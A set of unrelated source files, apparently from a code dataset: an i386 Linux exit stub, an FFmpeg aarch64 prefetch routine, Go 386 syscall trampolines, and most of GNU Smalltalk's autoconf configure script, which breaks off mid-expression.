 * Minimal Linux/i386 program entry point: terminate immediately with
 * exit status 0 via the sys_exit system call (AT&T syntax, GAS).
 *
 * i386 Linux syscall convention: %eax = syscall number (1 = exit),
 * %ebx = first argument (the exit status), trap via int $0x80.
 *
 * Fix: the original used "movb $0, %bl", which only clears the low 8
 * bits of %ebx; the kernel reads the full %ebx as the status, and
 * registers are not guaranteed zero at ELF entry, so the upper bits
 * could leak garbage into the exit code. xorl clears all 32 bits.
 */
        .globl  _start
        .text
_start:
        xorl    %eax, %eax              /* eax = 0 */
        incl    %eax                    /* eax = 1 = __NR_exit */
        xorl    %ebx, %ebx              /* ebx = exit status 0 (full reg) */
        int     $0x80                   /* enter kernel; does not return */
| {
"language": "Assembly"
} |
/*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/aarch64/asm.S"
// Software prefetch over a strided buffer, two lines per iteration,
// implemented as a tail loop that branches back to the function entry.
// In (AAPCS64): x0 = buffer pointer, x1 = byte stride, w2 = line count
//   -- register roles inferred from usage here; presumably matches
//   ff_prefetch(mem, stride, h) in FFmpeg -- confirm against the C
//   prototype.  Clobbers x0, w2 and flags; returns nothing.
function ff_prefetch_aarch64, export=1
subs w2, w2, #2 // consume two lines; sets flags for b.gt below
prfm pldl1strm, [x0] // prefetch for load, L1, streaming: first line
prfm pldl1strm, [x0, x1] // second line, one stride further on
add x0, x0, x1, lsl #1 // advance pointer by 2*stride
b.gt X(ff_prefetch_aarch64) // loop while remaining count > 0
ret
endfunc
| {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System calls for 386, Linux
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
//
// Each TEXT is a NOSPLIT, zero-frame trampoline: the $0-N annotation is
// frame-size 0 with N bytes of arguments, which must match the Go
// declarations (28 = 3 args + 4 results x 4 bytes; 40 = 6 args + 4
// results; 36 for the socketcall variants).  JMP (not CALL) keeps the
// caller's argument frame in place for the target.
TEXT ·Syscall(SB),NOSPLIT,$0-28
JMP syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-40
JMP syscall·Syscall6(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-28
JMP syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-40
JMP syscall·RawSyscall6(SB)
TEXT ·socketcall(SB),NOSPLIT,$0-36
JMP syscall·socketcall(SB)
TEXT ·rawsocketcall(SB),NOSPLIT,$0-36
JMP syscall·rawsocketcall(SB)
TEXT ·seek(SB),NOSPLIT,$0-28
JMP syscall·seek(SB)
| {
"language": "Assembly"
} |
dnl Hey Emacs, I want this in -*- Autoconf -*- mode, please.
dnl ---
dnl Copyright 1992-2009 Free Software Foundation, Inc.
dnl Please see COPYING for a description of your rights and responsibilities
dnl with this software.
dnl Process this file with autoconf to produce a configure script.
dnl 2.63 needed by testsuite, actually
AC_PREREQ(2.63)
AC_INIT([GNU Smalltalk], 3.2.90, [email protected], smalltalk,
[http://smalltalk.gnu.org/])
MAINTAINER="[email protected]"
m4_ifdef([AM_SILENT_RULES], [AM_SILENT_RULES([yes])])
dnl CURRENT:REVISION:AGE means this is the REVISION-th version of
dnl the CURRENT-th interface; all the interface from CURRENT-AGE
dnl to CURRENT are supported.
GST_REVISION(8:3:1)
AC_CONFIG_AUX_DIR([build-aux])
AC_CONFIG_MACRO_DIR([build-aux])
AC_CONFIG_SRCDIR([main.c])
AC_CONFIG_TESTDIR(tests)
AC_CONFIG_HEADERS([config.h])
GST_PROG_GAWK
AM_INIT_AUTOMAKE
AC_CANONICAL_HOST
if test -d $srcdir/.git; then
GIT_REVISION=-`git rev-parse --short HEAD 2>/dev/null || echo git`
else
GIT_REVISION=
fi
AC_DEFINE_UNQUOTED([PACKAGE_GIT_REVISION], ["$GIT_REVISION"],
[The git version that GNU Smalltalk was compiled from.])
RSE_BOLD
dnl
dnl ------------------------------- PROGRAMS ------------------
{ echo; echo "${term_bold}Build Tools:${term_norm}"; } >& AS_MESSAGE_FD
GST_PROG_CC(strict-aliasing, dnl enabled optimizations
gcse, dnl disabled optimizations
all write-strings pointer-arith declaration-after-statement, dnl enabled warnings
strict-aliasing pointer-sign long-double format switch) dnl disabled warnings
if test "$GCC" != yes; then
AC_MSG_ERROR([Please use GCC to compile GNU Smalltalk.])
fi
case "$host" in
alpha*-*-*) CFLAGS="$CFLAGS -mieee" ;;
esac
# We don't require Automake 1.10, so invoke _AM_DEPENDENCIES manually. And
# since we actually use Objective-C only on Mac OS (for libsdl), for now we
# get by with using gcc as an Objective-C compiler.
AC_SUBST(OBJC, [$CC])
AC_SUBST(OBJCFLAGS, [$CFLAGS])
_AM_DEPENDENCIES(OBJC)
AC_PROG_SED
AC_PROG_LN_S
GST_PROG_LN
PKG_PROG_PKG_CONFIG
AC_PATH_TOOL(WINDRES, windres, no)
AC_PATH_PROG(INSTALL_INFO, install-info, :, $PATH:/sbin:/usr/sbin)
AC_PATH_PROG(ZIP, zip, no, $PATH)
AC_CHECK_PROG(TIMEOUT, timeout, [timeout 600s], [env])
if test "$ZIP" = no; then
AC_MSG_ERROR([Please install InfoZIP to use GNU Smalltalk.])
fi
# For Wine, compile in GST a generic path to zip.exe. For build time,
# wrap the native zip with winewrapper to hide Windows paths from it.
GST_WINE_IF([WINEWRAPPERDEP='winewrapper$(EXEEXT)'
WINEWRAPPER='$(abs_top_builddir)/winewrapper$(EXEEXT)'
XZIP='$(WINEWRAPPER) '$ZIP
ZIP=zip.exe,
AC_CONFIG_FILES([makesetup], [chmod +x makesetup])],
[WINEWRAPPER=
WINEWRAPPERDEP=
XZIP=$ZIP])
AC_SUBST([WINEWRAPPER])
AC_SUBST([WINEWRAPPERDEP])
AC_SUBST([XZIP])
AC_ARG_WITH(emacs,
[ --without-emacs disable Emacs modes for Smalltalk], ,
with_emacs=yes)
test "$with_emacs" = no && EMACS=no
AM_PATH_LISPDIR
GST_PATH_LISPSTARTDIR
GST_EMACS_PACKAGE(comint)
AM_CONDITIONAL(WITH_EMACS, test "$EMACS" != no)
AM_CONDITIONAL(WITH_EMACS_COMINT, test "$ac_cv_emacs_comint" != no)
dnl We only want the GNU implementations
AM_MISSING_PROG(LEX, flex, $missing_dir)
AM_MISSING_PROG(YACC, bison, $missing_dir)
AM_MISSING_PROG(GPERF, gperf, $missing_dir)
AM_MISSING_PROG(AUTOM4TE, autom4te, $missing_dir)
dnl
dnl ------------------------------ SUBDIRS --------------------
PKG_CHECK_MODULES(GNUTLS, gnutls,
[ac_cv_lib_gnutls_gnutls_global_init=yes],
[GST_HAVE_LIB(gnutls, gnutls_global_init)])
if test "$ac_cv_lib_gnutls_gnutls_global_init" = yes; then
AC_DEFINE(HAVE_GNUTLS, 1, [Define to 1 if gnutls is being used])
fi
AC_ARG_WITH(system-libltdl,
[ --with-system-libltdl[=PATH] use system libltdl.la (search in PATH if given)],
[], [with_system_libltdl=detect])
GST_HAVE_LIB([ltdl], [lt_dlopen])
case $with_system_libltdl in
yes|no|detect)
if test $ac_cv_lib_ltdl_lt_dlopen = no; then
AC_MSG_ERROR([libltdl is required to compile GNU Smalltalk])
elif test $with_system_libltdl = no; then
AC_MSG_WARN([libltdl is required to compile GNU Smalltalk])
AC_MSG_WARN([ignoring --without-system-libltdl])
fi
INCLTDL= LIBLTDL=-lltdl
;;
*)
INCLTDL="-I$with_system_libltdl/../include"
LIBLTDL="-L$with_system_libltdl -lltdl"
esac
AC_SUBST(INCLTDL)
AC_SUBST(LIBLTDL)
AC_ARG_WITH(system-libffi,
[ --with-system-libffi[=PATH] use system libffi.la (search in PATH if given)],
[], [with_system_libffi=detect])
PKG_CHECK_MODULES(LIBFFI, libffi,
[ac_cv_lib_libffi_ffi_prep_cif=yes],
[GST_HAVE_LIB(libffi, ffi_prep_cif)])
case $with_system_libffi in
yes|no|detect)
if test $ac_cv_lib_libffi_ffi_prep_cif = no; then
AC_MSG_ERROR([libffi is required to compile GNU Smalltalk])
elif test $with_system_libffi = no; then
AC_MSG_WARN([libffi is required to compile GNU Smalltalk])
AC_MSG_WARN([ignoring --without-system-libffi])
fi
INCFFI=$LIBFFI_CFLAGS
LIBFFI=${LIBFFI_LIBS:-'-lffi'}
;;
*)
INCFFI="-I$with_system_libffi/../include"
LIBFFI="-L$with_system_libffi -lffi"
esac
case $host in
*-*-darwin[[912]]* ) LIBFFI_EXECUTABLE_LDFLAGS=-Wl,-allow_stack_execute ;;
*) LIBFFI_EXECUTABLE_LDFLAGS= ;;
esac
AC_SUBST(INCFFI)
AC_SUBST(LIBFFI)
AC_SUBST(LIBFFI_EXECUTABLE_LDFLAGS)
case $ac_configure_args in
*--enable-subdir) ;;
*) ac_configure_args="$ac_configure_args --enable-subdir" ;;
esac
AC_SNPRINTFV_CONVENIENCE
AC_CONFIG_SUBDIRS(snprintfv)
AC_ARG_ENABLE(generational-gc,
[ --disable-generational-gc disable generational garbage collection], ,
[case $host in
*-k*bsd-gnu | \
*-*-cygwin* | *-*-mingw* | \
ia64-*-* | alpha*-*-* | sparc*-*-* )
enable_generational_gc=no ;;
*)
enable_generational_gc=yes ;;
esac])
AC_ARG_WITH(system-libsigsegv,
[ --with-system-libsigsegv[=PATH] use system libsigsegv.la likewise],
[], [with_system_libsigsegv=detect])
GST_HAVE_LIB([sigsegv], [sigsegv_install_handler])
if test $enable_generational_gc = no; then
INCSIGSEGV= LIBSIGSEGV=
else
case $with_system_libsigsegv in
yes|no|detect)
if test $ac_cv_lib_sigsegv_sigsegv_install_handler = no; then
AC_MSG_ERROR([libsigsegv is required by default to compile GNU Smalltalk.
To proceed, configure with --disable-generational-gc.])
elif test $with_system_libsigsegv = no; then
AC_MSG_WARN([libsigsegv is required by default to compile GNU Smalltalk.])
AC_MSG_WARN([You specified --without-system-libsigsegv, but it will be])
AC_MSG_WARN([ignored; if you wanted to avoid using libsigsegv altogether])
AC_MSG_WARN([you should use --disable-generational-gc instead.])
fi
INCSIGSEGV= LIBSIGSEGV=-lsigsegv
;;
*)
INCSIGSEGV="-I$with_system_libsigsegv/../include"
LIBSIGSEGV="-L$with_system_libsigsegv -lsigsegv"
esac
AC_DEFINE(HAVE_SIGSEGV_H, 1, [Define to 1 if libsigsegv is being used])
fi
AC_SUBST(INCSIGSEGV)
AC_SUBST(LIBSIGSEGV)
AC_ARG_WITH(imagedir,
[ --with-imagedir=PATH path where to place the system image
(default: /usr/local/var/lib/$PACKAGE)],
[imagedir="$withval"],
[imagedir=`echo "$libdir" | sed \
-e 's,${exec_prefix},${localstatedir},' \
-e "s,${exec_prefix},\${localstatedir}," `/$PACKAGE ])
AC_SUBST(imagedir)
AC_ARG_WITH(moduledir,
[ --with-moduledir=PATH path where to look for modules
(default: /usr/local/lib/$PACKAGE)],
[moduledir="$withval"],
[moduledir='${pkglibdir}'])
moduleexecdir='${moduledir}'
AC_SUBST(moduledir)
AC_SUBST(moduleexecdir)
dnl
dnl ------------------------------ C COMPILER / OS ------------
{ echo; echo "${term_bold}Platform environment:${term_norm}"; } >& AS_MESSAGE_FD
GST_C_SYNC_BUILTINS
if test $gst_cv_have_sync_fetch_and_add = no; then
AC_MSG_ERROR([Synchronization primitives not found, please use a newer compiler.])
fi
GST_LOCK
AC_SYS_LARGEFILE
AC_C_INLINE
AC_C_RESTRICT
dnl Test for broken solaris include file. Should be moved to gnulib maybe?
AC_MSG_CHECKING([for broken sys/avl.h])
AC_PREPROC_IFELSE([AC_LANG_SOURCE([#include <sys/avl.h>
#ifndef _AVL_H
would be useless anyway
#endif
])], [
AC_MSG_RESULT(yes)
AC_DEFINE(_AVL_H, 1,
[Define to 1 if, like Solaris, your system has a sys/avl.h header that
pollutes the name space.])], [
AC_MSG_RESULT(no)])
GST_C_HIDDEN_VISIBILITY
GST_C_LONG_DOUBLE
GST_C_GOTO_VOID_P
AC_DEFINE_UNQUOTED(HOST_SYSTEM, "$host",
[Define to the host triplet.])
AC_DEFINE_UNQUOTED(EXEEXT, "$ac_exeext",
[Define to the extension for executable files.])
case "$ac_exeext:$host_os" in
:*) ac_argv_exeext= ;;
.exe:cygwin*) ac_argv_exeext= ;;
.exe:*) ac_argv_exeext=$ac_exeext ;;
esac
AC_DEFINE_UNQUOTED(ARGV_EXEEXT, "$ac_argv_exeext",
[Define to the extension for executable files, as it appears in argv[0].])
AC_C_BIGENDIAN
AC_CHECK_ALIGNOF(double)
AC_CHECK_ALIGNOF(long double)
AC_CHECK_ALIGNOF(long long)
AC_CHECK_SIZEOF(off_t)
AC_CHECK_SIZEOF(int)
AC_CHECK_SIZEOF(long)
AC_CHECK_SIZEOF(wchar_t, , [[
#include <wchar.h>]])
AC_CHECK_SIZEOF(OOP, , [[
typedef void *OOP;]])
AC_LIBTOOL_DLOPEN
AC_LIBTOOL_WIN32_DLL
AC_PROG_LIBTOOL
LIBGST_CFLAGS="$SYNC_CFLAGS"
case '$host_cpu: $CFLAGS ' in
i*86:*' -pg '*) ;;
i*86:*) LIBGST_CFLAGS="$LIBGST_CFLAGS -fomit-frame-pointer" ;;
*) ;;
esac
AC_SUBST(LIBGST_CFLAGS)
case "$host_os:$WINDRES" in
*:no) ICON= ;;
cygwin*|mingw*) ICON=gsticon.o ;;
*) ICON= ;;
esac
AC_SUBST(ICON)
dnl
dnl ------------------------------- C LIBRARY -----------------
{ echo; echo "${term_bold}C library features:${term_norm}"; } >& AS_MESSAGE_FD
AC_TYPE_SIGNAL
AC_TYPE_PID_T
AC_TYPE_SIZE_T
AC_HEADER_ASSERT
AC_CHECK_HEADERS_ONCE(stdint.h inttypes.h unistd.h poll.h sys/ioctl.h \
sys/resource.h sys/utsname.h stropts.h sys/param.h stddef.h limits.h \
sys/timeb.h termios.h sys/mman.h sys/file.h execinfo.h utime.h \
sys/select.h sys/wait.h fcntl.h crt_externs.h, [], [], [AC_INCLUDES_DEFAULT])
AC_CHECK_MEMBERS([struct stat.st_mtim.tv_nsec, struct stat.st_mtimensec,
struct stat.st_mtimespec.tv_nsec])
AC_TYPE_INT8_T
AC_TYPE_INT16_T
AC_TYPE_INT32_T
AC_TYPE_INT64_T
AC_TYPE_INTMAX_T
AC_TYPE_INTPTR_T
AC_TYPE_UINT8_T
AC_TYPE_UINT16_T
AC_TYPE_UINT32_T
AC_TYPE_UINT64_T
AC_TYPE_UINTMAX_T
AC_TYPE_UINTPTR_T
if test x$ac_cv_header_poll_h = xno; then
AC_CONFIG_LINKS([lib-src/poll.h:lib-src/poll_.h])
fi
AC_FUNC_ALLOCA
AC_FUNC_OBSTACK
AC_CHECK_LIB(m, atan)
GST_REPLACE_POLL
gt_FUNC_SETENV
GST_SOCKETS
AC_REPLACE_FUNCS(putenv strdup strerror strsignal mkstemp getpagesize \
getdtablesize strstr ftruncate floorl ceill sqrtl frexpl ldexpl asinl \
acosl atanl logl expl tanl sinl cosl powl truncl lrintl truncf lrintf \
lrint trunc strsep strpbrk symlink mkdtemp)
AC_CHECK_FUNCS_ONCE(gethostname memcpy memmove sighold uname usleep lstat \
grantpt popen getrusage gettimeofday fork strchr utimes utime readlink \
sigsetmask alarm select mprotect madvise waitpid accept4 \
setsid spawnl pread pwrite _NSGetExecutablePath _NSGetEnviron \
chown getgrnam getpwnam endgrent endpwent setgroupent setpassent)
if test "$ac_cv_func__NSGetEnviron" = yes; then
AC_DEFINE([environ], [_NSGetEnviron()],
[Define to an appropriate function call if the system does not provide the
environ variable.])
fi
AC_SEARCH_LIBS([nanosleep], [rt])
if test "$ac_cv_search_nanosleep" != no; then
AC_DEFINE(HAVE_NANOSLEEP, 1,
[Define if the system provides nanosleep.])
fi
AC_SEARCH_LIBS([clock_gettime], [rt])
if test "$ac_cv_search_clock_gettime" != no; then
AC_DEFINE(HAVE_CLOCK_GETTIME, 1,
[Define if the system provides clock_gettime.])
fi
AC_SEARCH_LIBS([timer_create], [rt])
if test "$ac_cv_search_timer_create" != no; then
AC_DEFINE(HAVE_TIMER_CREATE, 1,
[Define if the system provides timer_create.])
fi
GST_FUNC_LRINT
GST_FUNC_STRTOUL
GST_FUNC_LOCALTIME
dnl ------------------------- OTHER LIBRARIES -------------------
{ echo; echo "${term_bold}Auxiliary libraries:${term_norm}"; } >& AS_MESSAGE_FD
GST_LIBC_SO_NAME
GST_HAVE_GMP
GST_HAVE_READLINE
GST_PACKAGE_ALLOW_DISABLING
GST_PACKAGE_PREFIX([packages])
GST_PACKAGE_DEPENDENCIES([gst-tool$(EXEEXT) gst.im $(WINEWRAPPERDEP)])
GST_PACKAGE_ENABLE([Announcements], [announcements])
GST_PACKAGE_ENABLE([BloxTK], [blox/tk],
[GST_HAVE_TCLTK],
[gst_cv_tcltk_libs],
[Makefile], [blox-tk.la])
GST_PACKAGE_ENABLE([BLOXBrowser], [blox/browser])
GST_PACKAGE_ENABLE([Complex], [complex])
GST_PACKAGE_ENABLE([Continuations], [continuations])
GST_PACKAGE_ENABLE([CParser], [cpp])
GST_PACKAGE_ENABLE([DebugTools], [debug])
GST_PACKAGE_ENABLE([ObjectDumper], [object-dumper])
GST_PACKAGE_ENABLE([DBD-MySQL], [dbd-mysql])
AC_MSG_CHECKING([whether to run MySQL tests])
AC_ARG_ENABLE(mysql-tests,
[ --enable-mysql-tests=USER:PWD:DATABASE
test MySQL bindings [default=root:root:test]], ,
[enable_mysql_tests=no])
AC_SUBST(enable_mysql_tests)
AC_MSG_RESULT($enable_mysql_tests)
GST_PACKAGE_ENABLE([DBD-PostgreSQL], [dbd-postgresql],
[GST_HAVE_LIB(pq, PQconnectdb)],
[ac_cv_lib_pq_PQconnectdb])
GST_PACKAGE_ENABLE([DBD-SQLite], [dbd-sqlite],
[AC_CHECK_HEADER([sqlite3.h])
GST_HAVE_LIB(sqlite3, sqlite3_clear_bindings)],
[ac_cv_header_sqlite3_h],
[Makefile], [dbd-sqlite3.la])
GST_PACKAGE_ENABLE([DBI], [dbi])
GST_PACKAGE_ENABLE([GDBM], [gdbm],
[AC_CHECK_HEADER([gdbm.h])],
[ac_cv_header_gdbm_h],
[Makefile], [gdbm.la])
GST_PACKAGE_ENABLE([Glorp], [glorp])
GST_PACKAGE_ENABLE([Cairo], [cairo],
[PKG_CHECK_MODULES([CAIRO], cairo, [gst_cv_cairo=yes], [gst_cv_cairo=no])],
[gst_cv_cairo])
GST_PACKAGE_ENABLE([GLib], [glib], [
AM_PATH_GLIB_2_0(2.0.0, [
PKG_CHECK_MODULES(GTHREAD, gthread-2.0 >= 2.0.0,
[gst_cv_glib=yes], [gst_cv_glib=no])
], [], gobject)
if test $gst_cv_glib = yes; then
ac_save_LIBS=$LIBS
ac_save_CFLAGS=$CFLAGS
LIBS="$LIBS $GLIB_LIBS"
CFLAGS="$CFLAGS $GLIB_CFLAGS"
AC_CHECK_FUNCS([g_poll])
if test $ac_cv_func_g_poll = no; then
AC_DEFINE([g_poll], [poll], [Define to poll if your glib does not provide g_poll.])
fi
LIBS=$ac_save_LIBS
CFLAGS=$ac_save_CFLAGS
fi],
[gst_cv_glib],
[Makefile], [gst-glib.la libgst-gobject.la])
GST_PACKAGE_ENABLE([GObject-Introspection], [gir], [
PKG_CHECK_MODULES(GIR, gobject-introspection-1.0 >= 0.9.3,
[gst_cv_gir=yes], [gst_cv_gir=no])],
[gst_cv_gir])
GST_PACKAGE_ENABLE([GTK], [gtk], [
AC_ARG_ENABLE(gtk,
[ --enable-gtk={yes,no,blox}
enable GTK+ bindings. Blox/GTK is experimental.], ,
enable_gtk=yes)
if test "$enable_gtk" != no && test "$gst_cv_glib" != no; then
maybe_enable_gtk=$enable_gtk
enable_gtk=no
AM_PATH_GTK_2_0(2.0.0,
[PKG_CHECK_MODULES(ATK, atk >= 1.0.0,
[PKG_CHECK_MODULES(PANGO, pango >= 1.0.0,
[enable_gtk=$maybe_enable_gtk], :)], [:])])
fi],
[enable_gtk gst_cv_cairo],
[Makefile], [gst-gtk.la])
GST_PACKAGE_ENABLE([BloxGTK], [blox/gtk],, [enable_gtk])
GST_PACKAGE_ENABLE([Blox], [blox/tests],
[enable_blox=no
case x"$enable_gtk" in
xno|xnot\ found) ;; *) enable_blox=yes ;; esac
case x"$gst_cv_tcltk_libs" in
xno|xnot\ found) ;; *) enable_blox=yes ;; esac],
[enable_blox], [package.xml])
GST_PACKAGE_ENABLE([WebServer], [httpd])
GST_PACKAGE_ENABLE([I18N], [i18n],
[AC_CHECK_FUNCS_ONCE([nl_langinfo])
AM_LANGINFO_CODESET
AM_ICONV],
[ac_cv_func_nl_langinfo am_cv_func_iconv],
[Makefile], [i18n.la])
GST_PACKAGE_ENABLE([Iconv], [iconv],
[AM_ICONV],
[am_cv_func_iconv],
[Makefile], [iconv.la])
GST_PACKAGE_ENABLE([Java], [java])
GST_PACKAGE_ENABLE([Digest], [digest], [], [], [Makefile], [digest.la])
GST_PACKAGE_ENABLE([GNUPlot], [gnuplot])
GST_PACKAGE_ENABLE([Magritte], [magritte])
GST_PACKAGE_ENABLE([Magritte-Seaside], [seaside/magritte])
GST_PACKAGE_ENABLE([NCurses],
[ncurses],
[GST_HAVE_LIB(ncurses, initscr)],
[ac_cv_lib_ncurses_initscr])
GST_PACKAGE_ENABLE([NetClients], [net], [], [], [Makefile])
GST_PACKAGE_ENABLE([DhbNumericalMethods], [numerics])
GST_PACKAGE_ENABLE([OpenGL], [opengl],
[GST_HAVE_OPENGL],
[gst_cv_opengl_libs],
[Makefile], [gstopengl.la])
GST_PACKAGE_ENABLE([GLUT], [glut],
[GST_HAVE_GLUT],
[gst_cv_glut_libs],
[Makefile], [gstglut.la])
GST_PACKAGE_ENABLE([LibSDL], [sdl/libsdl],
[PKG_CHECK_MODULES(SDL, sdl >= 1.2.0, [gst_cv_sdl=yes], [gst_cv_sdl=no])
case "$SDL_LIBS" in
*-framework,Cocoa* | *"-framework Cocoa"*) gst_cv_sdl_uses_cocoa=yes ;;
*) gst_cv_sdl_uses_cocoa=no ;;
esac
save_CFLAGS=$CFLAGS
save_LIBS=$LIBS
CFLAGS="$CFLAGS $SDL_CFLAGS"
LIBS="$LIBS $SDL_LIBS"
AC_LINK_IFELSE([AC_LANG_SOURCE([
#include <SDL.h>
#include <SDL_main.h>
int main(int argc, char **argv) { SDL_Init(0); return 0; }])],
[], [gst_cv_sdl=no])
LIBS=$save_LIBS
CFLAGS=$save_CFLAGS
# We do SDLmain's job on our own, and mingw32 is linked automatically
# into the DLL. If we do not do this, libtool refuses to create a DLL
# for the SDL module.
SDL_LIBS=`echo " $SDL_LIBS " | sed 's/ -lSDLmain / /; s/ -lmingw32 / /' `
AM_CONDITIONAL([HAVE_COCOA], [test $gst_cv_sdl_uses_cocoa = yes])],
[gst_cv_sdl],
[Makefile], [sdl.la])
GST_PACKAGE_ENABLE([LibSDL_GL], [sdl/libsdl_gl], [],
[gst_cv_sdl gst_cv_opengl_libs])
GST_PACKAGE_ENABLE([CairoSDL], [sdl/cairo],
[],
[gst_cv_cairo gst_cv_sdl])
GST_PACKAGE_ENABLE([LibSDL_image], [sdl/libsdl_image],
[GST_HAVE_LIB(SDL_image, IMG_Linked_Version)],
[ac_cv_lib_SDL_image_IMG_Linked_Version])
GST_PACKAGE_ENABLE([LibSDL_mixer], [sdl/libsdl_mixer],
[GST_HAVE_LIB(SDL_mixer, Mix_Linked_Version)],
[ac_cv_lib_SDL_mixer_Mix_Linked_Version])
GST_PACKAGE_ENABLE([LibSDL_sound], [sdl/libsdl_sound],
[GST_HAVE_LIB(SDL_sound, Sound_GetLinkedVersion)],
[ac_cv_lib_SDL_sound_Sound_GetLinkedVersion])
GST_PACKAGE_ENABLE([LibSDL_ttf], [sdl/libsdl_ttf],
[GST_HAVE_LIB(SDL_ttf, TTF_Init)],
[ac_cv_lib_SDL_ttf_TTF_Init])
GST_PACKAGE_ENABLE([Compiler], [stinst/compiler])
GST_PACKAGE_ENABLE([Parser], [stinst/parser])
GST_PACKAGE_ENABLE([ClassPublisher], [stinst/doc])
GST_PACKAGE_ENABLE([ProfileTools], [profile])
GST_PACKAGE_ENABLE([ROE], [roe])
GST_PACKAGE_ENABLE([SandstoneDb], [sandstonedb])
GST_PACKAGE_ENABLE([Seaside-Core], [seaside/core])
GST_PACKAGE_ENABLE([Seaside-Development], [seaside/dev])
GST_PACKAGE_ENABLE([Seaside-Examples], [seaside/examples])
GST_PACKAGE_ENABLE([Seaside], [seaside/swazoo])
GST_PACKAGE_ENABLE([Sport], [sport])
GST_PACKAGE_ENABLE([SUnit], [sunit])
GST_PACKAGE_ENABLE([Swazoo], [swazoo-httpd])
GST_PACKAGE_ENABLE([Sockets], [sockets], [], [gst_cv_sockets])
GST_PACKAGE_ENABLE([VFSAddOns], [vfs], [], [], [Makefile])
GST_PACKAGE_ENABLE([VisualGST], [visualgst])
GST_PACKAGE_ENABLE([XML-XMLNodeBuilder], [xml/builder])
GST_PACKAGE_ENABLE([XML-DOM], [xml/dom])
GST_PACKAGE_ENABLE([XML-ParserTests], [xml/tests])
GST_PACKAGE_ENABLE([XML-PullParser], [xml/pullparser])
GST_PACKAGE_ENABLE([XML-Expat], [xml/expat],
[AC_CHECK_HEADER([expat.h])
GST_HAVE_LIB(expat, XML_ParserCreateNS)],
[ac_cv_header_expat_h ac_cv_lib_expat_XML_ParserCreateNS],
[Makefile], [expat.la])
GST_PACKAGE_ENABLE([XML-XMLParser], [xml/parser])
GST_PACKAGE_ENABLE([XML-SAXDriver], [xml/saxdriver])
GST_PACKAGE_ENABLE([XML-SAXParser], [xml/saxparser])
GST_PACKAGE_ENABLE([XPath], [xml/xpath])
GST_PACKAGE_ENABLE([XSL], [xml/xsl])
GST_PACKAGE_ENABLE([ZLib],
[zlib],
[AC_CHECK_HEADER([zlib.h])
GST_HAVE_LIB(z, inflate)],
[ac_cv_header_zlib_h ac_cv_lib_z_inflate],
[Makefile], [zlib.la])
if test "$enable_gtk" = blox; then
BLOX_IMPLEMENTATION=BloxGTK
else
BLOX_IMPLEMENTATION=BloxTK
fi
AC_SUBST(BLOX_IMPLEMENTATION)
AC_ARG_ENABLE(jit,
[ --enable-jit enable dynamic translation to machine code], ,
enable_jit=no)
LIGHTNING_CONFIGURE_IF_NOT_FOUND([], enable_jit=no)
if test "$enable_jit" != no; then
AC_DEFINE(ENABLE_JIT_TRANSLATION, 1,
[Define to enable dynamic translation to machine code])
fi
AC_ARG_ENABLE(disassembler,
[ --enable-disassembler include a disassembler in the gst executable], ,
enable_disassembler=no)
AM_CONDITIONAL(ENABLE_DISASSEMBLER, test "$enable_disassembler" != no)
if test "$enable_disassembler" != no; then
AC_DEFINE(ENABLE_DISASSEMBLER, 1,
[Define to include a disassembler in the gst executable])
fi
AC_ARG_ENABLE(dld,
[ --disable-dld disable loading of external modules at runtime], ,
enable_dld=yes)
if test "$enable_dld" != no; then
AC_DEFINE(ENABLE_DLD, 1,
[Define to enable usage of libltdl to load external modules at runtime])
fi
AC_ARG_ENABLE(checking,
[ --enable-checking enable assertions at runtime], ,
enable_checking=no)
if test "$enable_checking" = no; then
AC_DEFINE(OPTIMIZE, 1,
[Define to disable assertion checking at runtime])
fi
AC_ARG_ENABLE(preemption,
[ --enable-preemption enable preemptive multitasking], ,
enable_preemption=no)
if test "$enable_preemption" != no; then
AC_DEFINE(ENABLE_PREEMPTION, 1,
[Define to enable preemptive multitasking of Smalltalk processes])
fi
GST_ARG_ENABLE_MODULES([Blox,TCP])
dnl
dnl ------------------------------- RELOCATABILITY ------------
# See if we can make the installed binaries relocatable
AC_MSG_CHECKING([whether to enable relocatable install])
AC_RELOCATABLE_NOP
relocatable_reason=$RELOCATABLE
# First of all, compute the final paths for the various components.
# Each acl_final_* variable is the corresponding installation
# directory with ${prefix}/${exec_prefix}/... references expanded.
AC_LIB_PREPARE_PREFIX
acl_final_datadir=`echo "${datadir}" | sed \
-e "s,\\\${datarootdir},$datarootdir," \
-e "s,\\\${exec_prefix},$acl_final_exec_prefix," \
-e "s,\\\${prefix},$acl_final_prefix," `
acl_final_bindir=`echo "${bindir}" | sed \
-e "s,\\\${exec_prefix},$acl_final_exec_prefix," \
-e "s,\\\${prefix},$acl_final_prefix," `
acl_final_libdir=`echo "${libdir}" | sed \
-e "s,\\\${exec_prefix},$acl_final_exec_prefix," \
-e "s,\\\${prefix},$acl_final_prefix," `
acl_final_libexecdir=`echo "${libexecdir}" | sed \
-e "s,\\\${exec_prefix},$acl_final_exec_prefix," \
-e "s,\\\${prefix},$acl_final_prefix," `
acl_final_pkgdatadir="$acl_final_datadir/$PACKAGE"
acl_final_pkglibdir="$acl_final_libdir/$PACKAGE"
# imagedir and moduledir may reference any of the standard
# directories, so substitute all of them.
acl_final_imagedir=`echo "${imagedir}" | sed \
-e "s,\\\${localstatedir},$localstatedir," \
-e "s,\\\${pkgdatadir},$pkgdatadir," \
-e "s,\\\${datadir},$datadir," \
-e "s,\\\${docdir},$docdir," \
-e "s,\\\${datarootdir},$datarootdir," \
-e "s,\\\${pkglibdir},$acl_final_pkglibdir," \
-e "s,\\\${libdir},$acl_final_libdir," \
-e "s,\\\${exec_prefix},$acl_final_exec_prefix," \
